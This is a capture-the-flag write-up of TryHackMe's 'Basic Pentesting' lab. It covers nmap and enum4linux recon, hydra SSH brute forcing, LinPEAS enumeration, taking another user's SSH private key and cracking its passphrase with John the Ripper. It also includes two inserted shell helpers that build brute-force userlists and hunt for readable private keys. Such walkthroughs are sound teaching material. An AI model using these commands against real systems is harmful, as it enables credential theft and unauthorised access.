Basic Pentesting
Web App Testing, Linux Privilege Escalation
This is my first ever lab in THM! It was pretty interesting to apply tools like nmap, LinPEAS, enum4linux, Hydra and more.
Lab: https://tryhackme.com/room/basicpentestingjt
Tasks
Deploy the Machine and connect to our network
Refer to the THM access page (https://tryhackme.com/access) to deploy the machine and connect to the VPN.
Find the services exposed by the machine
Question Hint: use an nmap scan to look for the open ports
This tests the basics of network recon. I created a directory first to store the output, and opened the result in Sublime Text to read through it more comfortably than on the CLI.
mkdir nmap
nmap -sC -sV -oN nmap/initial 10.10.38.122
subl nmap/initial

From here, there are a few open ports: 22 running SSH (OpenSSH, Ubuntu), 80 running the Apache webserver, and 139 and 445 running Samba.
Hence, these are the services exposed by the machine.
What is the name of the hidden directory on the webserver (enter name without /)?
Question Hint: use dirsearch/dirbuster to find the hidden directories
While I didn't use dirbuster/dirsearch/gobuster for this question, I found out that you can use nmap's http-enum script and enum4linux directly to retrieve the hidden directory.
Firstly, I went to the webserver to take a look at the page (ctrl+u to view the source), which contained a comment pointing at a dev note section.

Based on this, there should be a dev note section somewhere, so we have to use a web directory enumeration tool.
sudo nmap -p80 --script http-enum 10.10.38.122
enum4linux -a 10.10.38.122 | tee enum4linux.log
subl enum4linux.log

And that was the output! /development/ was the directory we were looking for. Entering the flag development gave us the correct answer. :)
Opening /development/ shows two text files, dev.txt and j.txt:

in dev.txt:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
in j.txt:
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
User brute-forcing to find the username & password
Going back to the enum4linux output (the "Users on ..." section), I was able to get the available usernames, jan and kay, which also answers questions 5 and 9.
Moving on to the password, I used hydra with rockyou.txt to brute-force jan's SSH login.
hydra -l jan -P '/usr/share/wordlists/rockyou.txt' ssh://10.10.38.122

From there, I was able to retrieve the password for the user jan, which was armando.
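Rather than reading usernames off the enum4linux output by hand, it is handy to turn them into a userlist that hydra can take with -L. The shell helper below is an added example, not part of the original writeup: it pulls local usernames from the two places enum4linux prints them (the "user:[name] rid:[...]" lines and the "DOMAIN\name (Local User)" lines from RID cycling), drops the nobody/guest accounts, and writes a deduplicated list. The sample enum4linux output embedded in it is constructed for illustration (the SIDs and the BASIC2 workgroup name are made up), and extract_smb_users, build_userlist and users_from_sample are names chosen here.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup: turn enum4linux output into a
# userlist for hydra -L. Function names are chosen here; the sample output
# below is constructed (SIDs and the BASIC2 workgroup name are made up).

# Read enum4linux output on stdin and print one lowercase username per line.
# Two places enum4linux reports local users:
#   user:[jan] rid:[0x3e9]                          (enumdomusers section)
#   S-1-22-1-1001 Unix User\jan (Local User)        (RID cycling section)
# Built-in nobody/guest accounts are dropped; groups are never matched.
extract_smb_users() {
    sed -n \
        -e 's/^user:\[\([^]]*\)\] rid:.*/\1/p' \
        -e 's/^S-1-[0-9-]* [^\\]*\\\([^ ]*\) (Local User).*/\1/p' |
    tr '[:upper:]' '[:lower:]' |
    grep -v -x -E 'nobody|guest' |
    sort -u
}

# Write the userlist from enum4linux LOG to OUT (e.g. for hydra -L OUT).
build_userlist() {
    extract_smb_users < "$1" > "$2"
}

# Constructed sample of the relevant enum4linux lines, for a stand-alone run.
SAMPLE_ENUM4LINUX=' =====( Users on 10.10.38.122 )=====
user:[kay] rid:[0x3e8]
user:[jan] rid:[0x3e9]
 =====( Users on 10.10.38.122 via RID cycling )=====
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-5-21-11-22-33-501 BASIC2\nobody (Local User)
S-1-5-21-11-22-33-513 BASIC2\None (Domain Group)'

users_from_sample() {
    printf '%s\n' "$SAMPLE_ENUM4LINUX" | extract_smb_users
}

# Stand-alone use: ./smbusers.sh enum4linux.log users.txt
if [ $# -ge 1 ]; then
    build_userlist "$1" "${2:-users.txt}"
else
    users_from_sample     # prints jan and kay, one per line
fi
```

Run it as extract_smb_users < enum4linux.log > users.txt, then hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.38.122; hydra's -L is the multi-user counterpart of the -l jan used above, so one run covers every account enum4linux turned up.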
What is the username?
Question Hint: what about using SMB to find a username?
Refer to question 4. Answer: jan
What is the password?
Question Hint: what about using a tool like hydra to bruteforce?
Refer to question 4. Answer: armando
What service do you use to access the server (answer in abbreviation in all caps)?
Question Hint: what command line utility is used for remote access?
To gain remote access, SSH in as jan, accept the host key (yes) and enter the password (armando):
ssh jan@10.10.38.122
yes
armando
Hence, the answer is SSH.
Enumerate the machine to find any vectors for privilege escalation
Question Hint: use a privilege escalation checklist or tool like LinEnum
For the privilege escalation, I used LinPEAS, a popular enumeration script that checks a Linux system for privilege escalation vectors.
But before that, I wanted to take a look around the files and directories myself.
(This didn't turn up much, as jan doesn't have many privileges.)
ls -la
cat .lesshst
cat /etc/passwd
sudo -l
cd ..
ls
cd kay
There wasn't much useful information here due to privilege issues, so I moved on to use LinPEAS.
Refer to qn 10 for continuation
What is the name of the other user you found (all lower case)?
Refer to question 8. Answer: kay
If you have found another user, what can you do with this information?
Question Hint: apart from a password, how else can a user access a machine?
I first copied the linPEAS script, which is already available on the THM attack machine, onto the target with scp (entering jan's password, armando, when prompted):
scp /opt/PEAS/linPEAS/linpeas.sh jan@10.10.38.122:/dev/shm
armando
After which, over the SSH session, I made the script executable and ran it, piping the output to both the console and linpeas.txt.
cd /dev/shm
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.txt
LinPEAS identified a readable id_rsa file in kay's home directory, which should be kay's SSH private key, so we can copy it back to the attack machine. Now it gets more interesting!
On the target, as jan:
cd /home/kay
ls
cd .ssh/
ls -la
cat id_rsa
Back on the attack machine, paste the key into a file, lock down its permissions (ssh refuses to use a private key that is readable by others) and try it:
nano kay_id_rsa
chmod 600 kay_id_rsa
ssh -i kay_id_rsa kay@10.10.38.122
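What made this step possible is that kay's private key is readable by another user. As an added example (not from the original writeup), the shell helpers below automate that check from the jan shell: they walk /home for files that look like private keys and are readable by the current user, report their permission bits, and tell apart keys that are usable as-is from passphrase-protected ones, so you know in advance whether a cracking step will be needed. The function names are chosen here and the sample key files used to exercise them are constructed; detection of new-format OpenSSH keys relies on the "bcrypt" KDF name that sits in the first bytes of the base64 payload when the key is encrypted.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup: find private keys the current
# user can read under a directory tree and classify them before cracking.
# Function names are chosen here; any sample files used with it are constructed.

# Print (sorted) every readable file under DIR (default /home) that looks like
# a private key: it sits in a .ssh directory or is named id_*, and its first
# line is a PEM/OpenSSH "PRIVATE KEY" header.
find_readable_keys() {
    dir=${1:-/home}
    find "$dir" -type f \( -path '*/.ssh/*' -o -name 'id_*' \) 2>/dev/null |
    while IFS= read -r f; do
        [ -r "$f" ] || continue            # other users' 0600 keys drop out here
        head -n 1 "$f" 2>/dev/null | grep -q 'PRIVATE KEY' && printf '%s\n' "$f"
    done | sort
}

# Exit 0 if FILE needs a passphrase, 1 if it can be used as-is.
# Legacy PEM keys announce encryption with a "Proc-Type: 4,ENCRYPTED" header.
# New-format OpenSSH keys store the cipher and KDF names ("aes256-ctr"/"bcrypt"
# when encrypted, "none"/"none" otherwise) right after the "openssh-key-v1"
# magic at the start of the base64 payload, so decode the first bytes and look
# for the KDF name.
key_is_encrypted() {
    f=$1
    grep -q '^Proc-Type: 4,ENCRYPTED' "$f" && return 0
    if head -n 1 "$f" | grep -q 'BEGIN OPENSSH PRIVATE KEY'; then
        sed '1d;$d' "$f" | tr -d '\n' | base64 -d 2>/dev/null |
            head -c 64 | tr -cd '[:print:]' | grep -q 'bcrypt' && return 0
    fi
    return 1
}

# Permission string of FILE as ls prints it, e.g. -rw-r--r-- (world-readable).
key_mode() { ls -ld "$1" | cut -c1-10; }

# One line per key found under DIR: path, mode, encrypted|plaintext.
report_keys() {
    find_readable_keys "$1" | while IFS= read -r f; do
        if key_is_encrypted "$f"; then state=encrypted; else state=plaintext; fi
        printf '%s %s %s\n' "$f" "$(key_mode "$f")" "$state"
    done
}

# Stand-alone use from the jan shell on the target: ./findkeys.sh /home
[ $# -ge 1 ] && report_keys "$1"
```

A world-readable mode such as -rw-r--r-- on another user's key is the finding itself, whatever the encryption state; a plaintext verdict means the key can be tried immediately, an encrypted one means the passphrase has to be cracked first. To confirm a verdict on a real key, ssh-keygen -y -P '' -f KEY prints the public key without prompting when the key is unencrypted and fails with an incorrect-passphrase error when it is not.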

What is the final password you obtain?
Question Hint: use john the ripper to bruteforce the passphrase
The key turns out to be passphrase-protected. We already know from the note left on the webserver that weak passwords are in use on this box (K cracked J's hash easily), so it is worth trying to crack the passphrase, and this is where John the Ripper comes in handy.
Firstly, I had to convert the key file into a hash format suitable for cracking, using ssh2john.
Then, I used a popular wordlist, rockyou.txt, which is also preinstalled on the THM attack machine.
/opt/JohnTheRipper/run/ssh2john.py kay_id_rsa > kay_id_rsa.hash
/opt/JohnTheRipper/run/john kay_id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

And we got the password beeswax, which is the SSH private key passphrase.
Now that we have the passphrase, we can log in as kay:
ssh -i kay_id_rsa kay@10.10.38.122
beeswax
ls -la
cat pass.bak
While I completely forgot to take a screenshot of the password obtained:
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
And that's the full writeup of this lab, done and dusted!